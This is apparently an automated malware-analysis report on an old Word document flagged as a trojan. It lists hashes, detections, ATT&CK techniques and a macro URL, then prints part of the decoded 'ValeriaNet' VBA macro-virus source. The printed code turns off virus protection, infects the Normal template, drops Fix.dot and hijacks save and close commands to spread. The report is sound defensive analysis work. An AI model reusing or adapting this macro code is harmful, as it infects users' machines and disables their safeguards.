Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 08e16fcc9d8d6f64…

MALICIOUS

Office (OLE)

Size: 107.5 KB
Created: 1997-09-17 11:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d7f0daf9126e37146d936a864b5d6cf7
SHA-1: cfe71d9e5261d60617404c283ee40f7177a9a133
SHA-256: 08e16fcc9d8d6f643cee2f747a1da5c6f3f5c2bb877195b84fa6a2d5530da14e
Risk Score: 422

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample contains legacy WordBasic and VBA macros, including the AutoOpen and Auto_Close auto-execution entry points, which are commonly abused for malicious purposes. Critical heuristics indicate an obfuscated Shell() call whose command text contains a URL, suggesting the macro is intended to download and execute a second-stage payload from the embedded URL http://hacking.error.sg.net. The ClamAV detections further confirm the malicious nature of the file.

Heuristics (9)

  • ClamAV: Win.Trojan.Pivis-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Obfuscated VBA Shell command with URL [critical] (OLE_VBA_OBFUSCATED_SHELL_URL)
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://hacking.error.sg.net (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 37060 bytes
SHA-256: e8866fb2791ff10779df30522ee5dacdbc2313734b1b6682e8da8d5f8b7fe287
Detection: ClamAV: Doc.Trojan.VMPCK1-9
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ValeriaNet"
Public AD As Object, NT As Object
Sub AutoOpen()
    On Error GoTo hapus
Dim NT As Object
Dockenor
Create_Loader
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents.Item(1).Name = "Valerianet" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents.Item(1).Name = "Valerianet" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = True Then GoTo Label_Exit
If ActivInstall = True And NormInstall = False Then Set Doc = ActiveDocument
If ActivInstall = False And NormInstall = True Then Set Doc = NormalTemplate
Pad = Options.DefaultFilePath(wdDocumentsPath)
ModuleLength = Doc.VBProject.VBComponents("Valerianet").CodeModule.CountOfLines
NT.Save
Doc.VBProject.VBComponents("valerianet").Export Pad + ("\Fix.txt")
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
ValeriaNet
Label_Exit:
CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
'CommandBars("Format").Controls("Style...").Delete
If NormInstall = True Then Call Create_Loader
Application.ScreenUpdating = True
Application.DisplayAlerts = wdAlertsAll
Application.EnableCancelKey = wdCancelInterrupt
hapus:
Dockenor
End Sub
Sub Create_Loader()
On Error Resume Next
Options.DefaultFilePath(wdStartupPath) = "C:\Windows"
Options.DefaultFilePath(wdTempFilePath) = "C:\Windows\inf"
Pad1 = Options.DefaultFilePath(wdStartupPath)
MyFile = Dir(Pad1 + "\Fix.dot")
If MyFile = "" Then
Set aDoc = NormalTemplate.OpenAsDocument
With aDoc
    .SaveAs FileName:=Pad1 + "\Fix.dot"
    .Close SaveChanges:=wdDoNotSaveChanges
End With
End If
End Sub
Sub ValeriaNet()
On Error Resume Next
Dockenor
Norkedoc
Call sim
Call Create_Loader
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If Month(Now()) = 1 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 2 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 3 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 4 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 5 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 6 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 7 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 8 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 9 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 10 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 11 And Day(Now()) = 26 Then Call ultah
If Month(Now()) = 12 And Day(Now()) = 26 Then Call ultah
With Dialogs(wdDialogFileSummaryInfo)
    .Author = "ValeriaNet Security System"
    .Title = "Word 97/2000 Valerianet "
    .Subject = "..WHO AM I..???"
    .Comments = "(c) Copyright 1999 AlrightReserved"
    .Execute
End With
bodo:
End Sub
Sub FileSave()
    On Error Resume Next
    Norkedoc
    Dockenor
    ActiveDocument.Save
    ValeriaNet
End Sub
Sub FileClose()
    On Error Resume Next
    Norkedoc
    Dockenor
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ValeriaNet
ActiveDocument.Close
End Sub
Sub FileSaveAs()
    On Error Resume Next
    Norkedoc
    Dockenor
    ValeriaNet
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileExit()
    On Error Resume Next
    Norkedoc
    Dockenor
    ValeriaNet
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub
Sub AutoExit()
    On Error Resume Next
    Norkedoc
    'Dockenor
    ValeriaNet
End Sub
Sub AutoExec()
On Error GoTo hapus
Nor
... (truncated)